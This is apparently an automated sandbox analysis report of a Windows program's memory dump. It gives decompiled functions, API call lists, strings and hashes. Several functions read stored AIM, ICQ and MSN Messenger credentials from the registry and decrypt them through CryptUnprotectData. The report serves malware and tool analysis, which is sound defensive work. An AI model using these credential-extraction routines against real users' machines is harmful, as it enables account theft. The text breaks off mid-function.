0x0040d854
0x0040d84a
0x0040d833
0x00000000
0x0040d809
0x0040d925
0x0040d925
0x0040d932

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
atoi.MSVCRT ref: 0040D840
memset.MSVCRT ref: 0040D869
_mbscpy.MSVCRT ref: 0040D8B3
_mbscpy.MSVCRT ref: 0040D8C6
RegCloseKey.ADVAPI32(?), ref: 0040D8FC
memset.MSVCRT ref: 0040D7DC

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

RegCloseKey.ADVAPI32(00000008), ref: 0040D925

Strings

Software\Mirabilis\ICQ\NewOwners, xrefs: 0040D7A4
MainLocation, xrefs: 0040D81C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
API String ID: 2897902629-2277304809
Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00411172, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0041118A
_mbscpy.MSVCRT ref: 00411198

Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171

_mbscpy.MSVCRT ref: 004111E8
_mbscat.MSVCRT ref: 004111F3
memset.MSVCRT ref: 004111CF

Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8

memset.MSVCRT ref: 00411217
memcpy.MSVCRT ref: 00411232
_mbscat.MSVCRT ref: 0041123D

Strings

\systemroot, xrefs: 004111A5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 912701516-1821301763
Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A

Uniqueness

Uniqueness Score: -1.00%

Function 004068B5, Relevance: 16.6, APIs: 11, Instructions: 58
clipboardmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068B5(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t20;
				void* _t28;
				void* _t33;
				long _t35;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E004067BA(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t35 = GetFileSize(_t14, 0);
					_t5 = _t35 + 1; // 0x1
					_t20 = GlobalAlloc(0x2000, _t5);
					_t28 = _t20;
					if(_t28 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						GlobalFix(_t28);
						_t33 = _t20;
						if(ReadFile(_v12, _t33, _t35,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t33 + _t35)) = 0;
							GlobalUnWire(_t28);
							SetClipboardData(1, _t28);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

0x004068bb
0x004068bf
0x004068c8
0x004068d1
0x004068d4
0x0040694a
0x004068d6
0x004068e2
0x004068e4
0x004068ed
0x004068f3
0x004068f7
0x0040692d
0x00406933
0x004068f9
0x004068fa
0x00406902
0x00406915
0x00000000
0x00406917
0x00406918
0x0040691c
0x00406925
0x00406925
0x00406915
0x00406939
0x00406941
0x0040694d
0x00406957

APIs

EmptyClipboard.USER32 ref: 004068BF

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
GlobalFix.KERNEL32(00000000), ref: 004068FA
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
GlobalUnWire.KERNEL32(00000000), ref: 0040691C
SetClipboardData.USER32(00000001,00000000), ref: 00406925
GetLastError.KERNEL32 ref: 0040692D
CloseHandle.KERNEL32(?), ref: 00406939
GetLastError.KERNEL32 ref: 00406944
CloseClipboard.USER32 ref: 0040694D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
String ID:
API String ID: 2565263379-0
Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004088D4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E004088D4(void* __ecx, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t38;
				char* _t48;
				void* _t50;
				void* _t57;
				int _t62;
				intOrPtr _t63;
				signed int _t68;
				signed int _t69;

				_t57 = __ecx;
				_t69 = _t68 & 0xfffffff8;
				0x414060();
				_t38 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t38;
				_v4 = 0;
				if(_t38 <= 0) {
					L15:
					return _t38;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t69 = _t69 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E004088D4(_t57);
								_t69 = _t69 + 0xc;
							}
							goto L14;
						}
						_t62 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t48 = strchr( &_a56, 9);
						_t69 = _t69 + 0x14;
						_v0 = _t48;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x41e1fc =  *0x41e1fc + 1;
								_t63 =  *0x41e1fc; // 0x0
								_t62 = _t63 + 0x11558;
							} else {
								_t62 = _v4 + 0x11171;
							}
						}
						_t50 = E00408BF9(_t62,  &_a4160);
						_pop(_t57);
						if(_t50 != 0) {
							if(_v0 != 0) {
								0x413cf4( &_a4160, _v0);
								_pop(_t57);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t62,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t38 = _v4;
					} while (_t38 < _a4);
					goto L15;
				}
			}

0x004088d4
0x004088d7
0x004088df
0x004088ea
0x004088f4
0x004088f8
0x004088fc
0x00408a22
0x00408a28
0x00408902
0x00408907
0x0040890e
0x00408913
0x0040891a
0x00408929
0x00408934
0x0040893c
0x00408940
0x0040894c
0x00000000
0x00000000
0x00408956
0x004089fa
0x004089fe
0x00408a00
0x00408a01
0x00408a05
0x00408a08
0x00408a0d
0x00408a0d
0x00000000
0x004089fe
0x0040895c
0x0040896a
0x00408971
0x0040897d
0x00408982
0x00408989
0x0040898d
0x00408992
0x004089a0
0x004089a6
0x004089ac
0x00408994
0x00408998
0x00408998
0x00408992
0x004089bb
0x004089c3
0x004089c4
0x004089ca
0x004089d8
0x004089de
0x004089de
0x004089f4
0x004089f4
0x00000000
0x00408a10
0x00408a10
0x00408a14
0x00408a18
0x00000000
0x00408907

APIs

GetMenuItemCount.USER32(?), ref: 004088EA
memset.MSVCRT ref: 0040890E
GetMenuItemInfoA.USER32(?), ref: 00408944
memset.MSVCRT ref: 00408971
strchr.MSVCRT ref: 0040897D
_mbscat.MSVCRT ref: 004089D8
ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4

Strings

0, xrefs: 00408929
6, xrefs: 00408934

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
String ID: 0$6
API String ID: 3540791495-3849865405
Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1E0, Relevance: 15.1, APIs: 10, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C1E0(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t44;
				signed int _t45;
				intOrPtr _t47;
				signed int _t52;
				intOrPtr _t81;
				signed char _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t91;

				_t83 = __ecx;
				_t87 = _a4;
				_t91 = _t87 - 0x402;
				_t90 = __ecx;
				if(_t91 > 0) {
					_t44 = _t87 - 0x415;
					__eflags = _t44;
					if(_t44 == 0) {
						_t45 = E00402942();
						__eflags = _t45;
						if(_t45 != 0) {
							L24:
							if(_t87 ==  *((intOrPtr*)(_t90 + 0x394))) {
								_t79 = _a12;
								_t85 =  *(_a12 + 0xc);
								_t47 =  *((intOrPtr*)(_t90 + 0x390));
								if((_t85 & 0x00000008) == 0) {
									__eflags = _t85 & 0x00000040;
									if((_t85 & 0x00000040) != 0) {
										 *0x41e1f4 =  *0x41e1f4 & 0x00000000;
										__eflags =  *0x41e1f4;
										SetFocus( *(_t47 + 0x184));
									}
								} else {
									E0040AAE2(_t47, _t79);
								}
							}
							return E00402E97(_t90, _t87, _a8, _a12);
						}
						E0040B1EC(__ecx);
						L23:
						E0040AFE6(_t83, _t90, __eflags, 0);
						goto L24;
					}
					_t52 = _t44 - 1;
					__eflags = _t52;
					if(_t52 == 0) {
						E0040B2B5(__ecx);
						goto L23;
					}
					__eflags = _t52 == 6;
					if(_t52 == 6) {
						SetFocus( *(__ecx + 0x174));
					}
					goto L24;
				}
				if(_t91 == 0) {
					 *(__ecx + 0x178) =  *(__ecx + 0x178) & 0x00000000;
					E0040B15B(__ecx);
					goto L23;
				}
				if(_t87 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t90 + 0x174)) = GetFocus();
					} else {
						E00402F49(__ecx, 0x41c);
					}
					goto L24;
				}
				if(_t87 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L24;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					return 1;
				}
				if(_t87 == 0x2b) {
					_t81 = _a12;
					__eflags =  *((intOrPtr*)(_t81 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t81 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t81 + 0x18), 1);
						SetTextColor( *(_t81 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t81 + 0x18),  *(__ecx + 0x388));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t89 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t89 + 0x18), __ecx + 0x285, 0xffffffff, _t89 + 0x1c, 4,  &_v28);
						SelectObject( *(_t89 + 0x18), _v8);
						_t87 = _a4;
					}
				} else {
					if(_t87 == 0x7b) {
						_t86 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x390)) + 0x184))) {
							E0040C01D(__ecx, _t86);
						}
					}
				}
				goto L24;
			}

0x0040c1e0
0x0040c1e9
0x0040c1f1
0x0040c1f3
0x0040c1f5
0x0040c325
0x0040c325
0x0040c32a
0x0040c34b
0x0040c350
0x0040c352
0x0040c362
0x0040c368
0x0040c36a
0x0040c36d
0x0040c373
0x0040c379
0x0040c382
0x0040c385
0x0040c38d
0x0040c38d
0x0040c394
0x0040c394
0x0040c37b
0x0040c37b
0x0040c37b
0x0040c379
0x00000000
0x0040c3a3
0x0040c356
0x0040c35b
0x0040c35d
0x00000000
0x0040c35d
0x0040c32c
0x0040c32c
0x0040c32d
0x0040c344
0x00000000
0x0040c344
0x0040c32f
0x0040c332
0x0040c33a
0x0040c33a
0x00000000
0x0040c332
0x0040c1fb
0x0040c315
0x0040c31c
0x00000000
0x0040c31c
0x0040c204
0x0040c2f3
0x0040c2f7
0x0040c30d
0x0040c2f9
0x0040c300
0x0040c300
0x00000000
0x0040c2f7
0x0040c20d
0x0040c2ca
0x0040c2d0
0x00000000
0x00000000
0x0040c2e5
0x00000000
0x0040c2ed
0x0040c216
0x0040c242
0x0040c248
0x0040c24e
0x0040c259
0x0040c267
0x0040c27e
0x0040c286
0x0040c287
0x0040c288
0x0040c289
0x0040c28a
0x0040c2a3
0x0040c2aa
0x0040c2b1
0x0040c2bd
0x0040c2bf
0x0040c2bf
0x0040c218
0x0040c21b
0x0040c227
0x0040c230
0x0040c238
0x0040c238
0x0040c230
0x0040c21b
0x00000000

APIs

SetBkMode.GDI32(?,00000001), ref: 0040C259
SetTextColor.GDI32(?,00FF0000), ref: 0040C267
SelectObject.GDI32(?,?), ref: 0040C27C
DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
SelectObject.GDI32(00000014,?), ref: 0040C2BD

Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066

LoadCursorA.USER32(00000067), ref: 0040C2DE
SetCursor.USER32(00000000), ref: 0040C2E5
SetFocus.USER32(?), ref: 0040C33A
SetFocus.USER32(?), ref: 0040C394

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
String ID:
API String ID: 4166086388-0
Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004037A2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004037A2(char* __edi, long long __fp0) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				int _v40;
				long long _v44;
				long long _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				int _t79;
				char _t80;
				signed int _t95;
				int _t99;
				int _t101;
				void* _t104;
				void* _t105;
				intOrPtr _t114;
				char _t116;
				char* _t117;
				void* _t118;
				long long _t119;
				long long* _t120;
				long long _t154;
				long long _t160;

				_t154 = __fp0;
				_t117 = __edi;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v52 = __fp0;
				_t118 = 0;
				_pop(_t105);
				_v40 = _t79;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = 0;
				_v32 = 0;
				_v60 = 0x20;
				_v68 = 0;
				_v56 = 0;
				_v64 = 0;
				if(_t79 <= 0) {
					L43:
					_v8 = _t104;
					_t80 = 0x1a;
					if(_v16 != _t104) {
						_v8 = _t80;
					}
					if(_v20 != _t104) {
						_v8 = _v8 + _t80;
					}
					if(_v24 != _t104) {
						_v8 = _v8 + 0xa;
					}
					if(_v28 != _t104) {
						_v8 = _v8 + 0x10;
					}
					if(_v12 != _t104) {
						_v8 = _v8 + 0x11;
					}
					if(_v32 != _t104) {
						_v8 = _v8 + 0x1e;
					}
					if(_v8 <= _t104) {
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return 0;
					} else {
						asm("fild dword [ebp-0x4]");
						 *_t120 = _t154;
						0x413d68(_t105, _t105);
						_v44 = _t154;
						 *_t120 =  *0x4196e8;
						0x413d68();
						asm("fdivr qword [ebp-0x28]");
						asm("fistp qword [ebp-0x30]");
						_t119 = _v52;
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return _t119;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t116 =  *((intOrPtr*)(_t118 + _t117));
					_v8 = _t116;
					if(_t116 - 0x41 <= 0x19) {
						_v16 = _v16 + 1;
					}
					if(_t116 - 0x61 <= 0x19) {
						_v20 = _v20 + 1;
					}
					if(_t116 - 0x30 <= 9) {
						_v24 = _v24 + 1;
					}
					if(_t116 - 0x20 <= 0xf) {
						_v28 = _v28 + 1;
					}
					if(_t116 - 0x3a <= 6) {
						_v12 = _v12 + 1;
					}
					if(_t116 - 0x5b <= 5) {
						_v12 = _v12 + 1;
					}
					if(_t116 < 0x7b) {
						L16:
						if(_t116 <= 0x7e) {
							goto L18;
						}
						goto L17;
					} else {
						if(_t116 > 0x7e) {
							L17:
							_v32 = _v32 + 1;
							L18:
							if(_t118 != _t104) {
								_t95 = 0;
								if(_v56 <= 0) {
									L27:
									_t95 = _t95 | 0xffffffff;
									L28:
									_t104 = 0;
									if(_t95 < 0) {
										E004040C3( &_v68, _v8);
										_t99 = abs( *((char*)(_t118 + _t117)) -  *((char*)(_t118 + _t117 - 1)));
										_pop(_t105);
										if(_t99 != 1) {
											_t47 = _t99 - 2; // -2
											_t105 = _t47;
											if(_t105 > 3) {
												if(_t99 < 6) {
													if(_t99 <= 0xa) {
														goto L42;
													}
													L40:
													_t154 = _v52 +  *0x4196f0;
													L41:
													_v52 = _t154;
													goto L42;
												}
												if(_t99 > 0xa) {
													goto L40;
												}
												_t154 = _v52 +  *0x4196f8;
												goto L41;
											}
											_t154 = _v52 +  *0x419700;
											goto L41;
										}
										_t160 = _v52;
										L30:
										_t154 = _t160 +  *0x419710;
										goto L41;
									}
									_t101 = abs(_t116 -  *((char*)(_t118 + _t117 - 1)));
									_t160 = _v52;
									_pop(_t105);
									if(_t101 != 0) {
										_t154 = _t160 +  *0x419708;
										goto L41;
									}
									goto L30;
								}
								L21:
								L21:
								if(_t95 < 0 || _t95 >= _v56) {
									_t114 = 0;
								} else {
									_t114 =  *((intOrPtr*)(_t95 + _v68));
								}
								if(_t114 == _t116) {
									goto L28;
								}
								_t95 = _t95 + 1;
								if(_t95 < _v56) {
									goto L21;
								}
								goto L27;
							}
							E004040C3( &_v68, _v8);
							goto L40;
						}
						_v12 = _v12 + 1;
						goto L16;
					}
					L42:
					_t118 = _t118 + 1;
				} while (_t118 < _v40);
				goto L43;
			}

0x004037a2
0x004037a2
0x004037ab
0x004037b0
0x004037b2
0x004037b4
0x004037b7
0x004037bb
0x004037bc
0x004037bf
0x004037c2
0x004037c5
0x004037c8
0x004037cb
0x004037ce
0x004037d1
0x004037d8
0x004037db
0x004037de
0x004037e1
0x00403917
0x0040391c
0x0040391f
0x00403920
0x00403922
0x00403922
0x00403928
0x0040392a
0x0040392a
0x00403930
0x00403932
0x00403932
0x00403939
0x0040393b
0x0040393b
0x00403942
0x00403944
0x00403944
0x0040394b
0x0040394d
0x0040394d
0x00403954
0x00403997
0x0040399c
0x004039a1
0x00000000
0x00403956
0x00403956
0x0040395b
0x0040395e
0x00403963
0x0040396c
0x0040396f
0x00403977
0x0040397f
0x00403982
0x00403985
0x0040398a
0x0040398f
0x00000000
0x00403990
0x00000000
0x00000000
0x00000000
0x004037e7
0x004037e7
0x004037e7
0x004037f0
0x004037f3
0x004037f5
0x004037f5
0x004037fe
0x00403800
0x00403800
0x00403809
0x0040380b
0x0040380b
0x00403814
0x00403816
0x00403816
0x0040381f
0x00403821
0x00403821
0x0040382a
0x0040382c
0x0040382c
0x00403832
0x0040383c
0x0040383f
0x00000000
0x00000000
0x00000000
0x00403834
0x00403837
0x00403841
0x00403841
0x00403844
0x00403846
0x00403858
0x0040385d
0x0040387c
0x0040387c
0x0040387f
0x0040387f
0x00403883
0x004038b3
0x004038c4
0x004038cc
0x004038cd
0x004038d4
0x004038d4
0x004038da
0x004038ea
0x004038ff
0x00000000
0x00000000
0x00403901
0x00403904
0x0040390a
0x0040390a
0x00000000
0x0040390a
0x004038ef
0x00000000
0x00000000
0x004038f4
0x00000000
0x004038f4
0x004038df
0x00000000
0x004038df
0x004038cf
0x0040389d
0x0040389d
0x00000000
0x0040389d
0x00403890
0x00403897
0x0040389a
0x0040389b
0x004038a5
0x00000000
0x004038a5
0x00000000
0x0040389b
0x00000000
0x0040385f
0x00403861
0x00403870
0x00403868
0x0040386b
0x0040386b
0x00403874
0x00000000
0x00000000
0x00403876
0x0040387a
0x00000000
0x00000000
0x00000000
0x0040387a
0x0040384e
0x00000000
0x0040384e
0x00403839
0x00000000
0x00403839
0x0040390d
0x0040390d
0x0040390e
0x00000000

APIs

strlen.MSVCRT ref: 004037AB
abs.MSVCRT ref: 00403890
abs.MSVCRT ref: 004038C4
log.MSVCRT ref: 0040395E
log.MSVCRT ref: 0040396F
??3@YAXPAX@Z.MSVCRT ref: 0040398A
??3@YAXPAX@Z.MSVCRT ref: 0040399C

Strings

, xrefs: 004037D1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$strlen
String ID:
API String ID: 4288758904-3916222277
Opcode ID: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
Opcode Fuzzy Hash: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE5D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,7614F420,00000000), ref: 0040FE8C
RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memcpy.MSVCRT ref: 0040FEFE
LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
RegCloseKey.ADVAPI32(?), ref: 0040FF79

Strings

User.NET Messenger Service, xrefs: 0040FF4F
, xrefs: 0040FEA7
Password.NET Messenger Service, xrefs: 0040FE7A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
String ID: $Password.NET Messenger Service$User.NET Messenger Service
API String ID: 2372935584-105384665
Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D7A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404D7A(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t7;
				_Unknown_base(*)()* _t12;
				struct HWND__* _t16;
				void* _t21;
				struct HINSTANCE__* _t24;

				_v12 = 8;
				_v8 = 0xff;
				_t16 = 0;
				_t21 = 0;
				_t24 = LoadLibraryA("comctl32.dll");
				if(_t24 == 0) {
					L5:
					 *0x415038();
					_t7 = 1;
					L6:
					if(_t7 != 0) {
						return 1;
					} else {
						MessageBoxA(_t7, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t12 = GetProcAddress(_t24, "InitCommonControlsEx");
				if(_t12 != 0) {
					_t21 = 1;
					_t16 =  *_t12( &_v12);
				}
				FreeLibrary(_t24);
				if(_t21 == 0) {
					goto L5;
				} else {
					_t7 = _t16;
					goto L6;
				}
			}

0x00404d87
0x00404d8e
0x00404d95
0x00404d97
0x00404d9f
0x00404da3
0x00404dcd
0x00404dcd
0x00404dd5
0x00404dd6
0x00404ddb
0x00404df8
0x00404ddd
0x00404dea
0x00404df3
0x00404df3
0x00404ddb
0x00404dab
0x00404db3
0x00404db9
0x00404dbc
0x00404dbc
0x00404dbf
0x00404dc7
0x00000000
0x00404dc9
0x00404dc9
0x00000000
0x00404dc9

APIs

LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
FreeLibrary.KERNEL32(00000000), ref: 00404DBF
MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA

Strings

comctl32.dll, xrefs: 00404D82
Error, xrefs: 00404DDF
InitCommonControlsEx, xrefs: 00404DA5
Error: Cannot load the common control classes., xrefs: 00404DE4

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C

Uniqueness

Uniqueness Score: -1.00%

Function 00406735, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
librarystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00406735(long __edi, intOrPtr _a4) {
				char _v8;
				void* _t8;
				void* _t9;
				long _t12;
				long _t22;

				_t22 = __edi;
				_t8 = 0;
				_t12 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t12 = 0x1900;
					}
				}
